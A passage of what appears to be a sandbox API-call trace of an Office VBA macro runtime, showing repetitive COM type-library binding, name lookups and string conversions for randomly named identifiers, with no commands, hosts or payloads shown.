ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.826] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.826] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.827] IUnknown:Release (This=0x665ba50) returned 0xd [0068.827] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.827] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.827] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.827] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.827] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.827] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.827] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.827] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.827] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.827] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.827] IUnknown:Release (This=0x665ba50) returned 0xd [0068.827] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.827] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.827] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.827] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.827] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.827] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.827] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.827] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.827] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.827] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.827] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.828] IUnknown:Release (This=0x665ba50) returned 0xd [0068.828] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.828] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.828] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.828] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ede, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="YwD4UZkA") returned 9 [0068.828] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YwD4UZkA", lHashVal=0x105ab5, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ede, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="YwD4UZkA") returned 9 [0068.828] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YwD4UZkA", lHashVal=0x105ab5, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ede, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="YwD4UZkA") returned 9 [0068.828] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YwD4UZkA", lHashVal=0x105ab5, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.828] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YwD4UZkA") returned 0x105ab5 [0068.828] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="YwD4UZkA" | out: _Dst="YwD4UZkA") returned 0x0 [0068.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="YwD4UZkA") returned 9 [0068.828] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.828] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YwD4UZkA", lHashVal=0x105ab5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.828] IUnknown:Release (This=0x665ba50) returned 0xd [0068.828] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.828] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YwD4UZkA", lHashVal=0x105ab5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.828] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.828] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.828] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YwD4UZkA", lHashVal=0x105ab5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.828] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.828] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.828] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YwD4UZkA", lHashVal=0x105ab5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.828] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60ede, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="YwD4UZkA") returned 9 [0068.828] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YwD4UZkA", lHashVal=0x105ab5, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.829] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.829] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a60ede | out: _Dst=0x67c2d40) returned 0x0 [0068.829] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YwD4UZkA") returned 0x10323e [0068.829] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_YwD4UZkA" | out: _Dst="_B_var_YwD4UZkA") returned 0x0 [0068.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_YwD4UZkA") returned 16 [0068.829] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.829] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_YwD4UZkA", lHashVal=0x10323e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.829] IUnknown:Release (This=0x665ba50) returned 0xd [0068.829] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.829] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_YwD4UZkA", lHashVal=0x10323e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.829] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.829] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.829] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_YwD4UZkA", lHashVal=0x10323e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.829] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.829] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.829] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_YwD4UZkA", lHashVal=0x10323e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.829] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.829] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.829] IUnknown:Release (This=0x665ba50) returned 0xd [0068.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc292a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_YwD4UZkA") returned 16 [0068.829] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_YwD4UZkA", lHashVal=0x10323e, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x55003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x59005f00720061, ppTypeComp=0x55003400000000, pDummy=0x0) returned 0x0 [0068.829] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a60ede | out: _Dst=0x144ec0) returned 0x0 [0068.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60fd6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lQGDDo1") returned 8 [0068.829] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lQGDDo1", lHashVal=0x1072d6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60fd6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lQGDDo1") returned 8 [0068.829] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lQGDDo1", lHashVal=0x1072d6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60fd6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lQGDDo1") returned 8 [0068.830] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lQGDDo1", lHashVal=0x1072d6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lQGDDo1") returned 0x1072d6 [0068.830] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="lQGDDo1" | out: _Dst="lQGDDo1") returned 0x0 [0068.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="lQGDDo1") returned 8 [0068.830] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.830] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lQGDDo1", lHashVal=0x1072d6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.830] IUnknown:Release (This=0x665ba50) returned 0xd [0068.830] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.830] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lQGDDo1", lHashVal=0x1072d6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.830] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.830] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.830] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lQGDDo1", lHashVal=0x1072d6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.830] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.830] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.830] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lQGDDo1", lHashVal=0x1072d6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.830] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60fd6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="lQGDDo1") returned 8 [0068.830] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lQGDDo1", lHashVal=0x1072d6, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.830] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.830] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a60fd6 | out: _Dst=0x67c2d40) returned 0x0 [0068.830] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lQGDDo1") returned 0x10765a [0068.830] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_lQGDDo1" | out: _Dst="_B_var_lQGDDo1") returned 0x0 [0068.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_lQGDDo1") returned 15 [0068.830] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.830] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lQGDDo1", lHashVal=0x10765a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.830] IUnknown:Release (This=0x665ba50) returned 0xd [0068.830] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.830] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lQGDDo1", lHashVal=0x10765a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.830] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.830] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.831] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lQGDDo1", lHashVal=0x10765a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.831] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.831] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.831] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lQGDDo1", lHashVal=0x10765a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.831] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.831] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.831] IUnknown:Release (This=0x665ba50) returned 0xd [0068.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc295a, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_lQGDDo1") returned 15 [0068.831] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lQGDDo1", lHashVal=0x10765a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x44004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x44004400000000, pDummy=0x0) returned 0x0 [0068.831] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a60fd6 | out: _Dst=0x144ec0) returned 0x0 [0068.831] ITypeComp:RemoteBind (in: This=0x665ba60, szName="NAZ1GBZA", lHashVal=0x1031ef, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60faa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="NAZ1GBZA") returned 9 [0068.831] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="NAZ1GBZA", lHashVal=0x1031ef, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60faa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="NAZ1GBZA") returned 9 [0068.831] ITypeComp:RemoteBind (in: This=0x665bd30, szName="NAZ1GBZA", lHashVal=0x1031ef, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.831] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="NAZ1GBZA") returned 0x1031ef [0068.831] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="NAZ1GBZA" | out: _Dst="NAZ1GBZA") returned 0x0 [0068.831] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="NAZ1GBZA") returned 9 [0068.831] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.831] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="NAZ1GBZA", lHashVal=0x1031ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.831] IUnknown:Release (This=0x665ba50) returned 0xd [0068.831] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.831] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="NAZ1GBZA", lHashVal=0x1031ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.831] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.831] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.831] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="NAZ1GBZA", lHashVal=0x1031ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.831] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.831] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.831] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="NAZ1GBZA", lHashVal=0x1031ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.831] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60faa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="NAZ1GBZA") returned 9 [0068.832] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="NAZ1GBZA", lHashVal=0x1031ef, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.832] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.832] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a60faa | out: _Dst=0x67c2d40) returned 0x0 [0068.832] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_NAZ1GBZA") returned 0x100978 [0068.832] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_NAZ1GBZA" | out: _Dst="_B_var_NAZ1GBZA") returned 0x0 [0068.832] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_NAZ1GBZA") returned 16 [0068.832] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.832] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_NAZ1GBZA", lHashVal=0x100978, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.832] IUnknown:Release (This=0x665ba50) returned 0xd [0068.832] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.832] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_NAZ1GBZA", lHashVal=0x100978, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.832] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.832] IUnknown:AddRef (This=0x665bd20) returned 0x7 